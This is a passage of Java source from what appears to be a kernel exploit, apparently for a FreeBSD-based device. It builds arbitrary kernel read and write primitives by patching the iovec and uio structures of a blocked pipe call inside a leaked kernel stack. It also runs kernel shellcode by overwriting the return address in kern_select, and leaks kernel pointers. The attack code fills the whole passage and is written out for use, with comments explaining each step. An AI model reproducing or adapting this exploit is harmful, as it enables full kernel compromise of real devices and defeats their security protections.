ioVec.setBase(pipeBufferAddress);
ioVec.setLength(size);
ioVec.serialize(ioVecAddress);
//Log.debug("Scanning kernel stack at " + TypeUtil.int64ToHex(stackDataBuffer.getAddress()) + " of size " + TypeUtil.int32ToHex(stackDataBuffer.getSize()) + " bytes");
while (targetReclaimJob.getCommandWaitFlag()) {
if (dumpKernelStackOfReclaimThread) {
Log.info("Kernel stack data:");
stackDataBuffer.dump();
}
if (dumpKernelStackPointers) {
Log.info("Classifying leaked kernel addresses");
final KernelAddressClassifier classifier = KernelAddressClassifier.fromBuffer(stackDataBuffer);
classifier.dump();
}
//Log.debug("Searching kernel stack for IO vector data");
//api.dumpMemory(ioVecAddress, Offsets.sizeOf_iovec);
final int offset = stackDataBuffer.find(ioVecAddress, Offsets.sizeOf_iovec);
//Log.debug("Found offset: " + TypeUtil.int32ToHex(offset));
if (offset != -1) {
final long ioVecMappedAddress = stackDataBuffer.getAddress() + offset;
final long uioMappedAddress = ioVecMappedAddress + Offsets.sizeOf_iovec;
//Log.debug("Found IO vector data in kernel stack at " + TypeUtil.int64ToHex(ioVecMappedAddress));
ioVec.deserialize(ioVecMappedAddress);
//Log.debug("iovec: " + TypeUtil.inspectObject(ioVec));
uio.deserialize(uioMappedAddress);
//Log.debug("uio: " + TypeUtil.inspectObject(uio));
if (ioVec.getBase() == pipeBufferAddress && ioVec.getLength() == size && uio.getSegmentFlag() == Constants.UIO_USERSPACE && uio.getReadWrite() == Constants.UIO_WRITE) {
//Log.debug("GOT MATCH!!!");
api.write64(ioVecMappedAddress + Offsets.offsetOf_iovec_base, kernelAddress);
api.write32(uioMappedAddress + Offsets.offsetOf_uio_segflg, Constants.UIO_SYSSPACE);
break;
}
}
Thread.yield();
}
// Extra step: unblock the write call on the reclaim thread by reading the garbage data back from the pipe.
//Log.debug("Reading garbage data from read pipe #" + readPipeDescriptor + " at " + TypeUtil.int64ToHex(pipeBufferAddress) + " of size " + TypeUtil.int32ToHex(garbageSize) + " bytes");
final long result = LibKernel.read(readPipeDescriptor, pipeBufferAddress, garbageSize);
if (result == -1L) {
api.warnMethodFailedPosix("read");
return null;
} else if (result != garbageSize) {
Log.warn("Result of read operation is not consistent: " + TypeUtil.int64ToHex(result) + " vs " + TypeUtil.int32ToHex(garbageSize));
}
// Wait until the reclaim thread reports its result.
//Log.debug("Waiting for command processor");
while (targetReclaimJob.getCommandWaitFlag()) {
Thread.yield();
}
// Get result from reclaim thread.
final long result2 = targetReclaimJob.getCommandResult();
final int errNo = targetReclaimJob.getCommandErrNo();
//Log.debug("Write result from reclaim thread is " + TypeUtil.int64ToHex(result2) + " and error is " + errNo);
if (result2 == -1L) {
api.warnMethodFailedPosix("write", errNo);
return null;
} else if (result2 != size) {
Log.warn("Result of write operation is not consistent: " + TypeUtil.int64ToHex(result2) + " vs " + TypeUtil.int64ToHex(size));
}
// Read data from corresponding pipe.
//Log.debug("Reading data from read pipe #" + readPipeDescriptor + " at " + TypeUtil.int64ToHex(userAddress) + " of size " + TypeUtil.int64ToHex(size) + " bytes");
final long result3 = LibKernel.read(readPipeDescriptor, userAddress, size);
if (result3 == -1L) {
api.warnMethodFailedPosix("read");
return null;
}
//Log.debug("Number of bytes read: " + TypeUtil.int64ToHex(result3));
return new Long(result3);
}
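// Write path of the blocked-pipe trick, mirroring `readSlowInternal`:
// 1) The reclaim thread is told (via CMD_WRITE) to read `size` bytes from the pipe into `pipeBufferAddress`;
// the pipe is empty, so the call blocks inside `pipe_read`.
// 2) The main thread locates the blocked thread's `struct iovec`/`struct uio` in the leaked kernel stack,
// points `iov_base` at `kernelAddress` and switches `uio_segflg` to `UIO_SYSSPACE`.
// 3) The main thread writes `size` bytes from `userAddress` into the pipe, unblocking the read; the kernel
// then copies the pipe data to `kernelAddress` via `bcopy` instead of `copyout` to user space.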
private Long writeSlowInternal(long kernelAddress, long userAddress, long size) {
Checks.ensureTrue(KernelHelper.checkSizeForReadWriteIntoPipe(size));
if (size == 0L) {
return new Long(0L);
}
// pipe_read(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
// uiomove(void* cp = &rpipe->pipe_buffer.buffer[rpipe->pipe_buffer.out], int n = size, struct uio* uio = uio)
// uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
// UIO_USERSPACE: copyout(const void* kaddr = cp, void* uaddr = iov->iov_base, size_t len = cnt)
// UIO_SYSSPACE: bcopy(const void* src = cp, void* dst = iov->iov_base, size_t len = cnt)
// Clear pipe buffer.
//api.clearMemory(pipeBufferAddress, pipeBufferCapacity);
// Set up parameters for command processor.
targetReclaimJob.setCommandWaitFlag(true);
targetReclaimJob.setCommandArg(0, userAddress); // src
targetReclaimJob.setCommandArg(1, kernelAddress); // dst
targetReclaimJob.setCommandArg(2, size); // size
// Issue write command.
Log.debug("Issuing write command");
targetReclaimJob.setCommand(CMD_WRITE);
// Wait for the read call on the reclaim thread to block.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
// We have this partial stack layout:
// struct {
// struct iovec aiov;
// struct uio auio;
// };
//
// To locate it inside the leaked stack buffer, build a search pattern from the known `aiov` contents.
ioVec.setBase(pipeBufferAddress);
ioVec.setLength(size);
ioVec.serialize(ioVecAddress);
//Log.debug("Scanning kernel stack at " + TypeUtil.int64ToHex(stackDataBuffer.getAddress()) + " of size " + TypeUtil.int32ToHex(stackDataBuffer.getSize()) + " bytes");
while (targetReclaimJob.getCommandWaitFlag()) {
if (dumpKernelStackOfReclaimThread) {
Log.info("Kernel stack data:");
stackDataBuffer.dump();
}
if (dumpKernelStackPointers) {
Log.info("Classifying leaked kernel addresses");
final KernelAddressClassifier classifier = KernelAddressClassifier.fromBuffer(stackDataBuffer);
classifier.dump();
}
//Log.debug("Searching kernel stack for IO vector data");
//api.dumpMemory(ioVecAddress, Offsets.sizeOf_iovec);
final int offset = stackDataBuffer.find(ioVecAddress, Offsets.sizeOf_iovec);
//Log.debug("Found offset: " + TypeUtil.int32ToHex(offset));
if (offset != -1) {
final long ioVecMappedAddress = stackDataBuffer.getAddress() + offset;
final long uioMappedAddress = ioVecMappedAddress + Offsets.sizeOf_iovec;
//Log.debug("Found IO vector data in kernel stack at " + TypeUtil.int64ToHex(ioVecMappedAddress));
ioVec.deserialize(ioVecMappedAddress);
//Log.debug("iovec: " + TypeUtil.inspectObject(ioVec));
uio.deserialize(uioMappedAddress);
//Log.debug("uio: " + TypeUtil.inspectObject(uio));
if (ioVec.getBase() == pipeBufferAddress && ioVec.getLength() == size && uio.getSegmentFlag() == Constants.UIO_USERSPACE && uio.getReadWrite() == Constants.UIO_READ) {
//Log.debug("GOT MATCH!!!");
api.write64(ioVecMappedAddress + Offsets.offsetOf_iovec_base, kernelAddress);
api.write32(uioMappedAddress + Offsets.offsetOf_uio_segflg, Constants.UIO_SYSSPACE);
break;
}
}
Thread.yield();
}
// Write data into corresponding pipe.
//Log.debug("Writing data to write pipe #" + writePipeDescriptor + " at " + TypeUtil.int64ToHex(userAddress) + " of size " + TypeUtil.int64ToHex(size));
final long result = LibKernel.write(writePipeDescriptor, userAddress, size);
if (result == -1L) {
api.warnMethodFailedPosix("write");
return null;
}
// Wait until the reclaim thread reports its result.
//Log.debug("Waiting for command processor");
while (targetReclaimJob.getCommandWaitFlag()) {
Thread.yield();
}
// Get result from reclaim thread.
final long result2 = targetReclaimJob.getCommandResult();
final int errNo = targetReclaimJob.getCommandErrNo();
//Log.debug("Read result from reclaim thread is " + TypeUtil.int64ToHex(result2) + " and error is " + errNo);
if (result2 == -1L) {
api.warnMethodFailedPosix("read", errNo);
return null;
} else if (result != result2) {
Log.warn("Results of read/write operations are not consistent: " + TypeUtil.int64ToHex(result2) + " vs " + TypeUtil.int64ToHex(result));
}
//Log.debug("Number of bytes written: " + TypeUtil.int64ToHex(result2));
return new Long(result2);
}
//-------------------------------------------------------------------------
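// Runs `runnableForReclaimThread` on the captured reclaim thread by issuing CMD_EXEC to its command
// processor, while this (main) thread keeps invoking `runnableForMainThread` until the command completes.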
public void execute(Runnable runnableForReclaimThread, Runnable runnableForMainThread) {
Checks.ensureNotNull(targetReclaimJob);
synchronized (targetReclaimJob) {
// Set up parameters for command processor.
targetReclaimJob.setCommandWaitFlag(true);
targetReclaimJob.setCommandRunnable(runnableForReclaimThread);
// Issue execute command.
//Log.debug("Issuing execute command");
targetReclaimJob.setCommand(CMD_EXEC);
// Wait for the reclaim thread to finish the command, running the main-thread callback in the meantime.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
while (targetReclaimJob.getCommandWaitFlag()) {
if (runnableForMainThread != null) {
runnableForMainThread.run();
}
Thread.yield();
}
}
}
private static interface ReclaimThreadExecutor {
public abstract void runOnReclaimThread(MemoryBuffer stackDataBuffer);
public abstract void runOnMainThread(MemoryBuffer stackDataBuffer);
}
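// Convenience wrapper around `execute`: both callbacks of the executor receive the buffer that maps the
// reclaim thread's kernel stack, so the main-thread callback can inspect or patch that stack while the
// reclaim-thread callback is blocked in the kernel.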
private boolean executeOnReclaimThread(final ReclaimThreadExecutor executor) {
Checks.ensureNotNull(executor);
execute(new Runnable() {
public void run() {
executor.runOnReclaimThread(stackDataBuffer);
}
}, new Runnable() {
public void run() {
executor.runOnMainThread(stackDataBuffer);
}
});
return true;
}
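// Kernel code execution via return-address overwrite: the reclaim thread blocks in `select` with a
// one-second timeout (inside `cv_timedwait_sig_sbt`), while the main thread scans the mapped kernel stack
// for the known return address inside `kern_select` (just after the `cv_timedwait_sig_sbt` call) and
// replaces it with `entrypointAddress`. When the wait ends, the kernel "returns" into the shellcode.
// The code below treats `select` failing with EINVAL afterwards as confirmation that the hijacked return
// path was taken.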
public boolean executeShellcode(long entrypointAddress) {
Checks.ensureNotZero(Offsets.addressOf_kernel__kern_select_post_cv_timedwait_sig_sbt);
class Executor implements ReclaimThreadExecutor {
private static final int WAIT_TIME_SECS = 1;
private static final int BUFFER_SIZE = 0x80;
private final MemoryBuffer buffer;
private final long bufferAddress;
private final long timeoutAddress;
private final long returnAddressAddress;
private final long entrypointAddress;
private boolean succeeded = false;
private boolean completed = false;
public Executor(long entrypointAddress) {
buffer = new MemoryBuffer(BUFFER_SIZE);
bufferAddress = buffer.getAddress();
timeoutAddress = bufferAddress;
returnAddressAddress = timeoutAddress + Offsets.sizeOf_timeval;
final TimeVal timeout = new TimeVal(WAIT_TIME_SECS);
timeout.serialize(timeoutAddress);
api.write64(returnAddressAddress, Offsets.addressOf_kernel__kern_select_post_cv_timedwait_sig_sbt);
this.entrypointAddress = entrypointAddress;
}
public void cleanup() {
buffer.cleanup();
}
public void runOnReclaimThread(MemoryBuffer stackDataBuffer) {
//Log.debug("Do blocking call on reclaim thread");
final int result = LibKernel.select(1, 0, 0, 0, timeoutAddress);
if (result == -1) {
final int errNo = api.getLastErrNo();
if (errNo == Constants.EINVAL) {
Log.debug("Syscall returned with expected error");
succeeded = true;
} else {
Log.warn("Syscall returned with unexpected error " + errNo);
}
} else {
Log.warn("Syscall unexpectedly succeeded");
}
}
public void runOnMainThread(MemoryBuffer stackDataBuffer) {
if (completed) {
return;
}
final int offset = stackDataBuffer.find(returnAddressAddress, 0x8);
if (offset != -1) {
//Log.debug("Found return address at " + TypeUtil.int32ToHex(offset));
stackDataBuffer.write64(offset, entrypointAddress);
//Log.debug("Return address changed from " + TypeUtil.int64ToHex(Offsets.addressOf_kernel__kern_select_post_cv_timedwait_sig_sbt) + " to " + TypeUtil.int64ToHex(entrypointAddress));
completed = true;
}
}
public boolean isSucceeded() {
return succeeded;
}
public boolean isCompleted() {
return completed;
}
}
Log.debug("Executing kernel shellcode");
final Executor executor = new Executor(entrypointAddress);
Checks.ensureTrue(executeOnReclaimThread(executor));
executor.cleanup();
if (!executor.isCompleted() || !executor.isSucceeded()) {
Log.warn("Executing kernel shellcode failed");
return false;
}
return true;
}
// TODO: Make generic version of it.
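// Runs `runnable` on the reclaim thread (typically something that blocks inside the kernel) and, while it
// runs, repeatedly scans the mapped kernel stack for values that look like kernel addresses, collecting
// them in a KernelAddressClassifier. With `justOnce` set, the stack is scanned only a single time.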
public KernelAddressClassifier leakKernelPointers(final Runnable runnable, final boolean justOnce) {
Checks.ensureNotNull(targetReclaimJob);
final KernelAddressClassifier classifier = new KernelAddressClassifier();
//Log.debug("Scanning kernel stack at " + TypeUtil.int64ToHex(stackDataBuffer.getAddress()) + " of size " + TypeUtil.int32ToHex(stackDataBuffer.getSize()) + " bytes");
final boolean[] finished = justOnce ? (new boolean[] { false }) : null;
execute(runnable, new Runnable() {
public void run() {
if (justOnce && finished[0]) {
return;
}
if (dumpKernelStackOfReclaimThread) {
Log.info("Leaked partial kernel stack data:");
stackDataBuffer.dump();
}
classifier.scan(stackDataBuffer);
if (justOnce) {
finished[0] = true;
}
}
});
if (dumpKernelStackPointers) {
classifier.dump();
}
return classifier;
}
}